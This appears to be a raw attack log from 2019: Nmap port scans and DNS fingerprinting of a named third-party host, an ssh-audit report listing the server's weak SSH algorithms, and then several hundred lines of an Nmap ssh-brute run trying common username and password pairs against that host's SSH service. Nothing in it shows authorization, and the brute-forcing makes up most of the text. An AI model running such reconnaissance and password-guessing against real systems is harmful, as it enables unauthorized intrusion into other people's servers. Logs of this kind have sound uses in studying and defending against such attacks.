1788 Country: United States
1789 Is Active: True (reset ttl 64)
1790 Port: 53/tcp open domain? syn-ack ttl 52
1791 Script Info: | dns-nsid:
1792 Script Info: | NSID: freedns2.registrar-servers.com (66726565646e73322e7265676973747261722d736572766572732e636f6d)
1793 Script Info: |_ id.server: freedns2.registrar-servers.com
1794 Script Info: | fingerprint-strings:
1795 Script Info: | DNSVersionBindReqTCP:
1796 Script Info: | version
1797 Script Info: |_ bind
1798 IP: 95.141.37.127
1799 HostName: freedns4.registrar-servers.com Type: NS
1800 HostName: freedns4.registrar-servers.com Type: PTR
1801 Country: Italy
1802 Is Active: True (reset ttl 64)
1803 Port: 53/tcp open domain? syn-ack ttl 50
1804 Script Info: | dns-nsid:
1805 Script Info: | NSID: freedns4.registrar-servers.com (66726565646e73342e7265676973747261722d736572766572732e636f6d)
1806 Script Info: |_ id.server: freedns4.registrar-servers.com
1807 Script Info: | fingerprint-strings:
1808 Script Info: | DNSVersionBindReqTCP:
1809 Script Info: | version
1810 Script Info: |_ bind
1811######################################################################################################################################
1812Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:20 EDT
1813Nmap scan report for www.ygmt.info (185.82.200.52)
1814Host is up (0.12s latency).
1815rDNS record for 185.82.200.52: latina.petite.guru
1816Not shown: 479 closed ports
1817PORT STATE SERVICE
181822/tcp open ssh
181980/tcp open http
1820443/tcp open https
182110000/tcp open snet-sensor-mgmt
1822
1823Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds
1824#######################################################################################################################################
1825Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:20 EDT
1826Nmap scan report for www.ygmt.info (185.82.200.52)
1827Host is up (0.085s latency).
1828rDNS record for 185.82.200.52: latina.petite.guru
1829Not shown: 8 closed ports, 2 filtered ports
1830PORT STATE SERVICE
183168/udp open|filtered dhcpc
183288/udp open|filtered kerberos-sec
1833123/udp open|filtered ntp
1834161/udp open|filtered snmp
1835500/udp open|filtered isakmp
1836
1837Nmap done: 1 IP address (1 host up) scanned in 3.34 seconds
1838#########################################################################################################################################
1839# general
1840(gen) banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8
1841(gen) software: OpenSSH 6.7p1
1842(gen) compatibility: OpenSSH 6.5-6.9, Dropbear SSH 2013.62+
1843(gen) compression: enabled (zlib@openssh.com)
1844
1845# key exchange algorithms
1846(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
1847(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
1848 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1849(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
1850 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1851(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
1852 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1853(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
1854 `- [info] available since OpenSSH 4.4
1855(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
1856 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
1857
1858# host-key algorithms
1859(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
1860(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
1861 `- [warn] using small 1024-bit modulus
1862 `- [warn] using weak random number generator could reveal the key
1863 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1864(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
1865 `- [warn] using weak random number generator could reveal the key
1866 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
1867(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
1868
1869# encryption algorithms (ciphers)
1870(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1871(enc) aes192-ctr -- [info] available since OpenSSH 3.7
1872(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1873(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
1874(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
1875(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
1876 `- [info] default cipher since OpenSSH 6.9.
1877
1878# message authentication code algorithms
1879(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
1880 `- [info] available since OpenSSH 6.2
1881(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
1882(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
1883(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
1884(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
1885 `- [info] available since OpenSSH 6.2
1886(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
1887 `- [warn] using small 64-bit tag size
1888 `- [info] available since OpenSSH 4.7
1889(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
1890 `- [info] available since OpenSSH 6.2
1891(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
1892 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1893(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
1894 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1895(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
1896 `- [warn] using weak hashing algorithm
1897 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1898
1899# algorithm recommendations (for OpenSSH 6.7)
1900(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
1901(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
1902(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
1903(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
1904(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
1905(rec) -ssh-dss -- key algorithm to remove
1906(rec) -hmac-sha2-512 -- mac algorithm to remove
1907(rec) -umac-128@openssh.com -- mac algorithm to remove
1908(rec) -hmac-sha2-256 -- mac algorithm to remove
1909(rec) -umac-64@openssh.com -- mac algorithm to remove
1910(rec) -hmac-sha1 -- mac algorithm to remove
1911(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
1912(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
1913#######################################################################################################################################
1914Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:20 EDT
1915NSE: [ssh-run] Failed to specify credentials and command to run.
1916NSE: [ssh-brute] Trying username/password pair: root:root
1917NSE: [ssh-brute] Trying username/password pair: admin:admin
1918NSE: [ssh-brute] Trying username/password pair: administrator:administrator
1919NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
1920NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
1921NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
1922NSE: [ssh-brute] Trying username/password pair: guest:guest
1923NSE: [ssh-brute] Trying username/password pair: user:user
1924NSE: [ssh-brute] Trying username/password pair: web:web
1925NSE: [ssh-brute] Trying username/password pair: test:test
1926NSE: [ssh-brute] Trying username/password pair: root:
1927NSE: [ssh-brute] Trying username/password pair: admin:
1928NSE: [ssh-brute] Trying username/password pair: administrator:
1929NSE: [ssh-brute] Trying username/password pair: webadmin:
1930NSE: [ssh-brute] Trying username/password pair: sysadmin:
1931NSE: [ssh-brute] Trying username/password pair: netadmin:
1932NSE: [ssh-brute] Trying username/password pair: guest:
1933NSE: [ssh-brute] Trying username/password pair: user:
1934NSE: [ssh-brute] Trying username/password pair: web:
1935NSE: [ssh-brute] Trying username/password pair: test:
1936NSE: [ssh-brute] Trying username/password pair: root:123456
1937NSE: [ssh-brute] Trying username/password pair: admin:123456
1938NSE: [ssh-brute] Trying username/password pair: administrator:123456
1939NSE: [ssh-brute] Trying username/password pair: webadmin:123456
1940NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
1941NSE: [ssh-brute] Trying username/password pair: netadmin:123456
1942NSE: [ssh-brute] Trying username/password pair: guest:123456
1943NSE: [ssh-brute] Trying username/password pair: user:123456
1944NSE: [ssh-brute] Trying username/password pair: web:123456
1945NSE: [ssh-brute] Trying username/password pair: test:123456
1946NSE: [ssh-brute] Trying username/password pair: root:12345
1947NSE: [ssh-brute] Trying username/password pair: admin:12345
1948NSE: [ssh-brute] Trying username/password pair: administrator:12345
1949NSE: [ssh-brute] Trying username/password pair: webadmin:12345
1950NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
1951NSE: [ssh-brute] Trying username/password pair: netadmin:12345
1952NSE: [ssh-brute] Trying username/password pair: guest:12345
1953NSE: [ssh-brute] Trying username/password pair: user:12345
1954NSE: [ssh-brute] Trying username/password pair: web:12345
1955NSE: [ssh-brute] Trying username/password pair: test:12345
1956NSE: [ssh-brute] Trying username/password pair: root:123456789
1957NSE: [ssh-brute] Trying username/password pair: admin:123456789
1958NSE: [ssh-brute] Trying username/password pair: administrator:123456789
1959NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
1960NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
1961NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
1962NSE: [ssh-brute] Trying username/password pair: guest:123456789
1963NSE: [ssh-brute] Trying username/password pair: user:123456789
1964NSE: [ssh-brute] Trying username/password pair: web:123456789
1965NSE: [ssh-brute] Trying username/password pair: test:123456789
1966NSE: [ssh-brute] Trying username/password pair: root:password
1967NSE: [ssh-brute] Trying username/password pair: admin:password
1968NSE: [ssh-brute] Trying username/password pair: administrator:password
1969NSE: [ssh-brute] Trying username/password pair: webadmin:password
1970NSE: [ssh-brute] Trying username/password pair: sysadmin:password
1971NSE: [ssh-brute] Trying username/password pair: netadmin:password
1972NSE: [ssh-brute] Trying username/password pair: guest:password
1973NSE: [ssh-brute] Trying username/password pair: user:password
1974NSE: [ssh-brute] Trying username/password pair: web:password
1975NSE: [ssh-brute] Trying username/password pair: test:password
1976NSE: [ssh-brute] Trying username/password pair: root:iloveyou
1977NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
1978NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
1979NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
1980NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
1981NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
1982NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
1983NSE: [ssh-brute] Trying username/password pair: user:iloveyou
1984NSE: [ssh-brute] Trying username/password pair: web:iloveyou
1985NSE: [ssh-brute] Trying username/password pair: test:iloveyou
1986NSE: [ssh-brute] Trying username/password pair: root:princess
1987NSE: [ssh-brute] Trying username/password pair: admin:princess
1988NSE: [ssh-brute] Trying username/password pair: administrator:princess
1989NSE: [ssh-brute] Trying username/password pair: webadmin:princess
1990NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
1991NSE: [ssh-brute] Trying username/password pair: netadmin:princess
1992NSE: [ssh-brute] Trying username/password pair: guest:princess
1993NSE: [ssh-brute] Trying username/password pair: user:princess
1994NSE: [ssh-brute] Trying username/password pair: web:princess
1995NSE: [ssh-brute] Trying username/password pair: test:princess
1996NSE: [ssh-brute] Trying username/password pair: root:12345678
1997NSE: [ssh-brute] Trying username/password pair: admin:12345678
1998NSE: [ssh-brute] Trying username/password pair: administrator:12345678
1999NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
2000NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
2001NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
2002NSE: [ssh-brute] Trying username/password pair: guest:12345678
2003NSE: [ssh-brute] Trying username/password pair: user:12345678
2004NSE: [ssh-brute] Trying username/password pair: web:12345678
2005NSE: [ssh-brute] Trying username/password pair: test:12345678
2006NSE: [ssh-brute] Trying username/password pair: root:1234567
2007NSE: [ssh-brute] Trying username/password pair: admin:1234567
2008NSE: [ssh-brute] Trying username/password pair: administrator:1234567
2009NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
2010NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
2011NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
2012NSE: [ssh-brute] Trying username/password pair: guest:1234567
2013NSE: [ssh-brute] Trying username/password pair: user:1234567
2014NSE: [ssh-brute] Trying username/password pair: web:1234567
2015NSE: [ssh-brute] Trying username/password pair: test:1234567
2016NSE: [ssh-brute] Trying username/password pair: root:abc123
2017NSE: [ssh-brute] Trying username/password pair: admin:abc123
2018NSE: [ssh-brute] Trying username/password pair: administrator:abc123
2019NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
2020NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
2021NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
2022NSE: [ssh-brute] Trying username/password pair: guest:abc123
2023NSE: [ssh-brute] Trying username/password pair: user:abc123
2024NSE: [ssh-brute] Trying username/password pair: web:abc123
2025NSE: [ssh-brute] Trying username/password pair: test:abc123
2026NSE: [ssh-brute] Trying username/password pair: root:nicole
2027NSE: [ssh-brute] Trying username/password pair: admin:nicole
2028NSE: [ssh-brute] Trying username/password pair: administrator:nicole
2029NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
2030NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
2031NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
2032NSE: [ssh-brute] Trying username/password pair: guest:nicole
2033NSE: [ssh-brute] Trying username/password pair: user:nicole
2034NSE: [ssh-brute] Trying username/password pair: web:nicole
2035NSE: [ssh-brute] Trying username/password pair: test:nicole
2036NSE: [ssh-brute] Trying username/password pair: root:daniel
2037NSE: [ssh-brute] Trying username/password pair: admin:daniel
2038NSE: [ssh-brute] Trying username/password pair: administrator:daniel
2039NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
2040NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
2041NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
2042NSE: [ssh-brute] Trying username/password pair: guest:daniel
2043NSE: [ssh-brute] Trying username/password pair: user:daniel
2044NSE: [ssh-brute] Trying username/password pair: web:daniel
2045NSE: [ssh-brute] Trying username/password pair: test:daniel
2046NSE: [ssh-brute] Trying username/password pair: root:monkey
2047NSE: [ssh-brute] Trying username/password pair: admin:monkey
2048NSE: [ssh-brute] Trying username/password pair: administrator:monkey
2049NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
2050NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
2051NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
2052NSE: [ssh-brute] Trying username/password pair: guest:monkey
2053NSE: [ssh-brute] Trying username/password pair: user:monkey
2054NSE: [ssh-brute] Trying username/password pair: web:monkey
2055NSE: [ssh-brute] Trying username/password pair: test:monkey
2056NSE: [ssh-brute] Trying username/password pair: root:babygirl
2057NSE: [ssh-brute] Trying username/password pair: admin:babygirl
2058NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
2059NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
2060NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
2061NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
2062NSE: [ssh-brute] Trying username/password pair: guest:babygirl
2063NSE: [ssh-brute] Trying username/password pair: user:babygirl
2064NSE: [ssh-brute] Trying username/password pair: web:babygirl
2065NSE: [ssh-brute] Trying username/password pair: test:babygirl
2066NSE: [ssh-brute] Trying username/password pair: root:qwerty
2067NSE: [ssh-brute] Trying username/password pair: admin:qwerty
2068NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
2069NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
2070NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
2071NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
2072NSE: [ssh-brute] Trying username/password pair: guest:qwerty
2073NSE: [ssh-brute] Trying username/password pair: user:qwerty
2074NSE: [ssh-brute] Trying username/password pair: web:qwerty
2075NSE: [ssh-brute] Trying username/password pair: test:qwerty
2076NSE: [ssh-brute] Trying username/password pair: root:lovely
2077NSE: [ssh-brute] Trying username/password pair: admin:lovely
2078NSE: [ssh-brute] Trying username/password pair: administrator:lovely
2079NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
2080NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
2081NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
2082NSE: [ssh-brute] Trying username/password pair: guest:lovely
2083NSE: [ssh-brute] Trying username/password pair: user:lovely
2084NSE: [ssh-brute] Trying username/password pair: web:lovely
2085NSE: [ssh-brute] Trying username/password pair: test:lovely
2086NSE: [ssh-brute] Trying username/password pair: root:654321
2087NSE: [ssh-brute] Trying username/password pair: admin:654321
2088NSE: [ssh-brute] Trying username/password pair: administrator:654321
2089NSE: [ssh-brute] Trying username/password pair: webadmin:654321
2090NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
2091NSE: [ssh-brute] Trying username/password pair: netadmin:654321
2092NSE: [ssh-brute] Trying username/password pair: guest:654321
2093NSE: [ssh-brute] Trying username/password pair: user:654321
2094NSE: [ssh-brute] Trying username/password pair: web:654321
2095NSE: [ssh-brute] Trying username/password pair: test:654321
2096NSE: [ssh-brute] Trying username/password pair: root:michael
2097NSE: [ssh-brute] Trying username/password pair: admin:michael
2098NSE: [ssh-brute] Trying username/password pair: administrator:michael
2099NSE: [ssh-brute] Trying username/password pair: webadmin:michael
2100NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
2101NSE: [ssh-brute] Trying username/password pair: netadmin:michael
2102NSE: [ssh-brute] Trying username/password pair: guest:michael
2103NSE: [ssh-brute] Trying username/password pair: user:michael
2104NSE: [ssh-brute] Trying username/password pair: web:michael
2105NSE: [ssh-brute] Trying username/password pair: test:michael
2106NSE: [ssh-brute] Trying username/password pair: root:jessica
2107NSE: [ssh-brute] Trying username/password pair: admin:jessica
2108NSE: [ssh-brute] Trying username/password pair: administrator:jessica
2109NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
2110NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
2111NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
2112NSE: [ssh-brute] Trying username/password pair: guest:jessica
2113NSE: [ssh-brute] Trying username/password pair: user:jessica
2114NSE: [ssh-brute] Trying username/password pair: web:jessica
2115NSE: [ssh-brute] Trying username/password pair: test:jessica
2116NSE: [ssh-brute] Trying username/password pair: root:111111
2117NSE: [ssh-brute] Trying username/password pair: admin:111111
2118NSE: [ssh-brute] Trying username/password pair: administrator:111111
2119NSE: [ssh-brute] Trying username/password pair: webadmin:111111
2120NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
2121NSE: [ssh-brute] Trying username/password pair: netadmin:111111
2122NSE: [ssh-brute] Trying username/password pair: guest:111111
2123NSE: [ssh-brute] Trying username/password pair: user:111111
2124NSE: [ssh-brute] Trying username/password pair: web:111111
2125NSE: [ssh-brute] Trying username/password pair: test:111111
2126NSE: [ssh-brute] Trying username/password pair: root:ashley
2127NSE: [ssh-brute] Trying username/password pair: admin:ashley
2128NSE: [ssh-brute] Trying username/password pair: administrator:ashley
2129NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
2130NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
2131NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
2132NSE: [ssh-brute] Trying username/password pair: guest:ashley
2133NSE: [ssh-brute] Trying username/password pair: user:ashley
2134NSE: [ssh-brute] Trying username/password pair: web:ashley
2135NSE: [ssh-brute] Trying username/password pair: test:ashley
2136NSE: [ssh-brute] Trying username/password pair: root:000000
2137NSE: [ssh-brute] Trying username/password pair: admin:000000
2138NSE: [ssh-brute] Trying username/password pair: administrator:000000
2139NSE: [ssh-brute] Trying username/password pair: webadmin:000000
2140NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
2141NSE: [ssh-brute] Trying username/password pair: netadmin:000000
2142NSE: [ssh-brute] Trying username/password pair: guest:000000
2143NSE: [ssh-brute] Trying username/password pair: user:000000
2144NSE: [ssh-brute] Trying username/password pair: web:000000
2145NSE: [ssh-brute] Trying username/password pair: test:000000
2146NSE: [ssh-brute] Trying username/password pair: root:iloveu
2147NSE: [ssh-brute] Trying username/password pair: admin:iloveu
2148NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
2149NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
2150NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
2151NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
2152NSE: [ssh-brute] Trying username/password pair: guest:iloveu
2153NSE: [ssh-brute] Trying username/password pair: user:iloveu
2154NSE: [ssh-brute] Trying username/password pair: web:iloveu
2155NSE: [ssh-brute] Trying username/password pair: test:iloveu
2156NSE: [ssh-brute] Trying username/password pair: root:michelle
2157NSE: [ssh-brute] Trying username/password pair: admin:michelle
2158NSE: [ssh-brute] Trying username/password pair: administrator:michelle
2159NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
2160NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
2161NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
2162NSE: [ssh-brute] Trying username/password pair: guest:michelle
2163NSE: [ssh-brute] Trying username/password pair: user:michelle
2164NSE: [ssh-brute] Trying username/password pair: web:michelle
2165NSE: [ssh-brute] Trying username/password pair: test:michelle
2166NSE: [ssh-brute] Trying username/password pair: root:tigger
2167NSE: [ssh-brute] Trying username/password pair: admin:tigger
2168NSE: [ssh-brute] Trying username/password pair: administrator:tigger
2169NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
2170NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
2171NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
2172NSE: [ssh-brute] Trying username/password pair: guest:tigger
2173NSE: [ssh-brute] Trying username/password pair: user:tigger
2174NSE: [ssh-brute] Trying username/password pair: web:tigger
2175NSE: [ssh-brute] Trying username/password pair: test:tigger
2176NSE: [ssh-brute] Trying username/password pair: root:sunshine
2177NSE: [ssh-brute] Trying username/password pair: admin:sunshine
2178NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
2179NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
2180NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
2181NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
2182NSE: [ssh-brute] Trying username/password pair: guest:sunshine
2183NSE: [ssh-brute] Trying username/password pair: user:sunshine
2184NSE: [ssh-brute] Trying username/password pair: web:sunshine
2185NSE: [ssh-brute] Trying username/password pair: test:sunshine
2186NSE: [ssh-brute] Trying username/password pair: root:chocolate
2187NSE: [ssh-brute] Trying username/password pair: admin:chocolate
2188NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
2189NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
2190NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
2191NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
2192NSE: [ssh-brute] Trying username/password pair: guest:chocolate
2193NSE: [ssh-brute] Trying username/password pair: user:chocolate
2194NSE: [ssh-brute] Trying username/password pair: web:chocolate
2195NSE: [ssh-brute] Trying username/password pair: test:chocolate
2196NSE: [ssh-brute] Trying username/password pair: root:password1
2197NSE: [ssh-brute] Trying username/password pair: admin:password1
2198NSE: [ssh-brute] Trying username/password pair: administrator:password1
2199NSE: [ssh-brute] Trying username/password pair: webadmin:password1
2200NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
2201NSE: [ssh-brute] Trying username/password pair: netadmin:password1
2202NSE: [ssh-brute] Trying username/password pair: guest:password1
2203NSE: [ssh-brute] Trying username/password pair: user:password1
2204NSE: [ssh-brute] Trying username/password pair: web:password1
2205NSE: [ssh-brute] Trying username/password pair: test:password1
2206NSE: [ssh-brute] Trying username/password pair: root:soccer
2207NSE: [ssh-brute] Trying username/password pair: admin:soccer
2208NSE: [ssh-brute] Trying username/password pair: administrator:soccer
2209NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
2210NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
2211NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
2212NSE: [ssh-brute] Trying username/password pair: guest:soccer
2213NSE: [ssh-brute] Trying username/password pair: user:soccer
2214NSE: [ssh-brute] Trying username/password pair: web:soccer
2215NSE: [ssh-brute] Trying username/password pair: test:soccer
2216NSE: [ssh-brute] Trying username/password pair: root:anthony
2217NSE: [ssh-brute] Trying username/password pair: admin:anthony
2218NSE: [ssh-brute] Trying username/password pair: administrator:anthony
2219NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
2220NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
2221NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
2222NSE: [ssh-brute] Trying username/password pair: guest:anthony
2223NSE: [ssh-brute] Trying username/password pair: user:anthony
2224NSE: [ssh-brute] Trying username/password pair: web:anthony
2225NSE: [ssh-brute] Trying username/password pair: test:anthony
2226NSE: [ssh-brute] Trying username/password pair: root:friends
2227NSE: [ssh-brute] Trying username/password pair: admin:friends
2228NSE: [ssh-brute] Trying username/password pair: administrator:friends
2229NSE: [ssh-brute] Trying username/password pair: webadmin:friends
2230NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
2231NSE: [ssh-brute] Trying username/password pair: netadmin:friends
2232NSE: [ssh-brute] Trying username/password pair: guest:friends
2233NSE: [ssh-brute] Trying username/password pair: user:friends
2234NSE: [ssh-brute] Trying username/password pair: web:friends
2235NSE: [ssh-brute] Trying username/password pair: test:friends
2236NSE: [ssh-brute] Trying username/password pair: root:purple
2237NSE: [ssh-brute] Trying username/password pair: admin:purple
2238NSE: [ssh-brute] Trying username/password pair: administrator:purple
2239NSE: [ssh-brute] Trying username/password pair: webadmin:purple
2240NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
2241NSE: [ssh-brute] Trying username/password pair: netadmin:purple
2242NSE: [ssh-brute] Trying username/password pair: guest:purple
2243NSE: [ssh-brute] Trying username/password pair: user:purple
2244NSE: [ssh-brute] Trying username/password pair: web:purple
2245NSE: [ssh-brute] Trying username/password pair: test:purple
2246NSE: [ssh-brute] Trying username/password pair: root:angel
2247NSE: [ssh-brute] Trying username/password pair: admin:angel
2248NSE: [ssh-brute] Trying username/password pair: administrator:angel
2249NSE: [ssh-brute] Trying username/password pair: webadmin:angel
2250NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
2251NSE: [ssh-brute] Trying username/password pair: netadmin:angel
2252NSE: [ssh-brute] Trying username/password pair: guest:angel
2253NSE: [ssh-brute] Trying username/password pair: user:angel
2254NSE: [ssh-brute] Trying username/password pair: web:angel
2255NSE: [ssh-brute] Trying username/password pair: test:angel
2256NSE: [ssh-brute] Trying username/password pair: root:butterfly
2257NSE: [ssh-brute] Trying username/password pair: admin:butterfly
2258NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
2259NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
2260NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
2261NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
2262NSE: [ssh-brute] Trying username/password pair: guest:butterfly
2263NSE: [ssh-brute] Trying username/password pair: user:butterfly
2264NSE: [ssh-brute] Trying username/password pair: web:butterfly
2265NSE: [ssh-brute] Trying username/password pair: test:butterfly
2266NSE: [ssh-brute] Trying username/password pair: root:jordan
2267NSE: [ssh-brute] Trying username/password pair: admin:jordan
2268NSE: [ssh-brute] Trying username/password pair: administrator:jordan
2269NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
2270NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
2271NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
2272NSE: [ssh-brute] Trying username/password pair: guest:jordan
2273NSE: [ssh-brute] Trying username/password pair: user:jordan
2274NSE: [ssh-brute] Trying username/password pair: web:jordan
2275NSE: [ssh-brute] Trying username/password pair: test:jordan
2276NSE: [ssh-brute] Trying username/password pair: root:fuckyou
2277NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
2278NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
2279NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
2280NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
2281NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
2282NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
2283NSE: [ssh-brute] Trying username/password pair: user:fuckyou
2284NSE: [ssh-brute] Trying username/password pair: web:fuckyou
2285NSE: [ssh-brute] Trying username/password pair: test:fuckyou
2286NSE: [ssh-brute] Trying username/password pair: root:123123
2287NSE: [ssh-brute] Trying username/password pair: admin:123123
2288NSE: [ssh-brute] Trying username/password pair: administrator:123123
2289NSE: [ssh-brute] Trying username/password pair: webadmin:123123
2290NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
2291NSE: [ssh-brute] Trying username/password pair: netadmin:123123
2292NSE: [ssh-brute] Trying username/password pair: guest:123123
2293NSE: [ssh-brute] Trying username/password pair: user:123123
2294NSE: [ssh-brute] Trying username/password pair: web:123123
2295NSE: [ssh-brute] Trying username/password pair: test:123123
2296NSE: [ssh-brute] Trying username/password pair: root:justin
2297NSE: [ssh-brute] Trying username/password pair: admin:justin
2298NSE: [ssh-brute] Trying username/password pair: administrator:justin
2299NSE: [ssh-brute] Trying username/password pair: webadmin:justin
2300NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
2301NSE: [ssh-brute] Trying username/password pair: netadmin:justin
